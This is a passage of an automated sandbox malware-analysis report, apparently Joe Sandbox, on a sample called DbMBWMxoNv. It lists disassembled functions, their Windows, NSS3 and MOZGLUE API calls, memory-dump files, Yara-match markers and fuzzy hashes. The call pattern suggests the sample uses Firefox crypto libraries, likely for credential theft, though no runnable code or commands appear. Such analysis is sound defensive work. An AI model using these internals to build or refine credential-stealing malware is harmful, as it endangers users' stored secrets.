Part of subcall function 6CF8FE20: TlsGetValue.KERNEL32(6CF65ADC,?,00000000,00000001,?,?,00000000,?,6CF5BA55,?,?), ref: 6CF8FE4B
Part of subcall function 6CF8FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF8FE5F

PR_Unlock.NSS3(?), ref: 6CF81F67

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID:
API String ID: 704537481-0
Opcode ID: bd1ed500c67e73282eb838f21406d8eae34a2b326e60121ec089624ff0be673a
Instruction ID: 20ef41356aeafaf4fa0ef94c5d3cbab5dfdcbad44b19d5137ce0a066e8d7e744
Opcode Fuzzy Hash: bd1ed500c67e73282eb838f21406d8eae34a2b326e60121ec089624ff0be673a
Instruction Fuzzy Hash: E521D676901204ABEB009F29DC45F9B3779EF45368F188665FD288BB11E730E954C7E1

Function 6CF41DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CF41E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CF41E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF41E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CF41E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CF41EAD

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: e305bd08286390485f96290026c9383b3517397b5baeed9e79b014e0865e741d
Instruction ID: 751aafd7cf0575e192d8811b1edeb24501144f3de51726f17559c4c187fb039a
Opcode Fuzzy Hash: e305bd08286390485f96290026c9383b3517397b5baeed9e79b014e0865e741d
Instruction Fuzzy Hash: 78212876E04315A7D7008E68DC40F8BBB949B84328F15C638ED695B782E730E96987D2

Function 6CF4AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CF43FFF,00000000,?,?,?,?,?,6CF41A1C,00000000,00000000), ref: 6CF4ADA7

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CF43FFF,00000000,?,?,?,?,?,6CF41A1C,00000000,00000000), ref: 6CF4ADB4

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CF43FFF,?,?,?,?,6CF43FFF,00000000,?,?,?,?,?,6CF41A1C,00000000), ref: 6CF4ADD5

Part of subcall function 6CF9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CF98D2D,?,00000000,?), ref: 6CF9FB85
Part of subcall function 6CF9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CF9FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D0694B0,?,?,?,?,?,?,?,?,6CF43FFF,00000000,?), ref: 6CF4ADEC

Part of subcall function 6CF9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0718D0,?), ref: 6CF9B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF43FFF), ref: 6CF4AE3C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: ee44105e8b5b3daf14b936ff9284b9f296c3c3311a1473bcea4cde9259ba7eb9
Instruction ID: da970a34601c4461435cd13f60d59a7f169376cb2782e2f2fca9ae0ba8ee1d63
Opcode Fuzzy Hash: ee44105e8b5b3daf14b936ff9284b9f296c3c3311a1473bcea4cde9259ba7eb9
Instruction Fuzzy Hash: 42113B71E002156BF7109B659C40FBF77F8DF9524CF04C139FC2996642F720E95982A2

Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02D1E098,?,004210F4,?,00000000,?), ref: 00416C0C
sscanf.NTDLL ref: 00416C39
SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02D1E098,?,004210F4), ref: 00416C52
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02D1E098,?,004210F4), ref: 00416C60
ExitProcess.KERNEL32 ref: 00416C7A

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 2c4cfc45c966258f6080351d080680f70321eb69ac785a5baa18a4ee6ae449e9
Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
Opcode Fuzzy Hash: 2c4cfc45c966258f6080351d080680f70321eb69ac785a5baa18a4ee6ae449e9
Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69

Function 00418950 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
wsprintfA.USER32 ref: 004189E0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

F(t, xrefs: 00418994, 004189A3
%dx%d, xrefs: 004189D7

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: F(t$%dx%d
API String ID: 2716131235-3934083006
Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5

Function 6CF6CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CF81E10: TlsGetValue.KERNEL32 ref: 6CF81E36
Part of subcall function 6CF81E10: EnterCriticalSection.KERNEL32(?,?,?,6CF5B1EE,2404110F,?,?), ref: 6CF81E4B
Part of subcall function 6CF81E10: PR_Unlock.NSS3 ref: 6CF81E76

free.MOZGLUE(?,6CF6D079,00000000,00000001), ref: 6CF6CDA5
PK11_FreeSymKey.NSS3(?,6CF6D079,00000000,00000001), ref: 6CF6CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CF6D079,00000000,00000001), ref: 6CF6CDCF
DeleteCriticalSection.KERNEL32(?,6CF6D079,00000000,00000001), ref: 6CF6CDE2
free.MOZGLUE(?), ref: 6CF6CDE9

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 0328cf74e8975186c309e23d819a679f968c761a6d457bb42e299baa8a7a18bc
Instruction ID: 88a3b41a17c3c818b75b9576515d1770003bd02ce5bf6ccf061e86a01ed0c71b
Opcode Fuzzy Hash: 0328cf74e8975186c309e23d819a679f968c761a6d457bb42e299baa8a7a18bc
Instruction Fuzzy Hash: EC117CB2A01115ABEF00ABA6EC44A96B77CFB04269B144121E92987E01E732F434C7E5

Function 6CFD2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CFD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CFD5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFD2CEC

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PR_EnterMonitor.NSS3(?), ref: 6CFD2D02
PR_EnterMonitor.NSS3(?), ref: 6CFD2D1F
PR_ExitMonitor.NSS3(?), ref: 6CFD2D42
PR_ExitMonitor.NSS3(?), ref: 6CFD2D5B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 631bcf702dc0a8dae68c4a3ed0b1ca52ecc168410555c909ad31a671277b8f20
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: DD01C4B5A042046FF7309E25FC40B87B7A1FF45318F0A4525E95987620E633FD1587D2

Function 6CFD2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CFD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CFD5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFD2D9C

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PR_EnterMonitor.NSS3(?), ref: 6CFD2DB2
PR_EnterMonitor.NSS3(?), ref: 6CFD2DCF
PR_ExitMonitor.NSS3(?), ref: 6CFD2DF2
PR_ExitMonitor.NSS3(?), ref: 6CFD2E0B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 86979779e939d2285b9f643eab6d52177067910fed66c5c3c8037b05a51b0cb9
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: C201C4B6A046006FFB309E25FC01FC7B7A1EF41318F0A4535E95987611D633F92586D2

Function 6D05BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D057AFE,?,?,?,?,?,?,?,?,6D05798A), ref: 6D05BDC3
free.MOZGLUE(?,?,6D057AFE,?,?,?,?,?,?,?,?,6D05798A), ref: 6D05BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D057AFE,?,?,?,?,?,?,?,?,6D05798A), ref: 6D05BDE9
free.MOZGLUE(?,00000000,00000000,?,6D057AFE,?,?,?,?,?,?,?,?,6D05798A), ref: 6D05BE21
free.MOZGLUE(00000000,00000000,?,6D057AFE,?,?,?,?,?,?,?,?,6D05798A), ref: 6D05BE32

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: be01616250b734a2063613206aabd77c0e5726c792f953a8401057fc9d8552e8
Instruction ID: db72ec75450502ef720c96b506e6126d449bd058d46665e265d01f1fd182a797
Opcode Fuzzy Hash: be01616250b734a2063613206aabd77c0e5726c792f953a8401057fc9d8552e8
Instruction Fuzzy Hash: 77110DB5900A219FDF20CF3AD825F5F3BB5BB46254B482035D90A87313E731A464CB95

Function 6D057C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6D057C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D057C83
malloc.MOZGLUE(00000001), ref: 6D057C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D057C9F
PR_GetCurrentThread.NSS3 ref: 6D057CAD

Part of subcall function 6D009BF0: TlsGetValue.KERNEL32(?,?,?,6D050A75), ref: 6D009C07

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: b34da274eafa23e7d2e5d903958e92565ca99fa43b04a59a0809cb9b481afedb
Instruction ID: fc0843719e8ed346a3698809f35d40e40c5beb5998036994595cb19033877fef
Opcode Fuzzy Hash: b34da274eafa23e7d2e5d903958e92565ca99fa43b04a59a0809cb9b481afedb
Instruction Fuzzy Hash: 60F0C2B1D1421A7BFB009F3AAD09A1B7B98EF40264B01C43AED09C7300E730E120CAA5

Function 6D05ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6D05A6D8), ref: 6D05AE0D
free.MOZGLUE(?), ref: 6D05AE14
DeleteCriticalSection.KERNEL32(6D05A6D8), ref: 6D05AE36
free.MOZGLUE(?), ref: 6D05AE3D
free.MOZGLUE(00000000,00000000,?,?,6D05A6D8), ref: 6D05AE47

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 8d4cd8295cbcd3365ba7eb324fa268069744d898df964a18b812f8a1e3691125
Instruction ID: 1055d2f60b80ba199830399b318334d6efad1d09f37715dec63064e14811f21e
Opcode Fuzzy Hash: 8d4cd8295cbcd3365ba7eb324fa268069744d898df964a18b812f8a1e3691125
Instruction Fuzzy Hash: 7AF096B5400A02A7DB108F68D808F5777BCBF86735B140328E52A87540D731F535C7D9

Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CA7E

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__getptd.LIBCMT ref: 0041CA95
__amsg_exit.LIBCMT ref: 0041CAA3
__lock.LIBCMT ref: 0041CAB3
__updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 43aa352ecdac546d7bb9d19126ece158e0320116eae550e85e33cbf8747ee50c
Instruction ID: 881f7b2c9d8fb923cee2b849dc5405b86a696dd403459b758afa502f67b157d1
Opcode Fuzzy Hash: 43aa352ecdac546d7bb9d19126ece158e0320116eae550e85e33cbf8747ee50c
Instruction Fuzzy Hash: D3F06231A802189BD622FBA95C867DE33A0AF00758F50014FE405662D2CB7C59C186DE

Function 6CEE7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CEE7D35

Strings

%s at line %d of [%.10s], xrefs: 6CEE7D2E
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CEE7D13, 6CEE7D1F, 6CEE7D47, 6CEE7D53, 6CEE7D5F
database corruption, xrefs: 6CEE7D29

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f3004fae7e47d6cef9b9e917ecb8bd9a5f69be98b160c915aa7aa9e1eca15c70
Instruction ID: 99f5da2864026b63c5116057dc0ea9ba2a9f8bb575eb1f6204d1e9dddf279f8f
Opcode Fuzzy Hash: f3004fae7e47d6cef9b9e917ecb8bd9a5f69be98b160c915aa7aa9e1eca15c70
Instruction Fuzzy Hash: 8531F471E0422997D710CF9DC880ABAB7F1AF8D349B690196E458B7787D271D841C7A4

Function 6CED6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

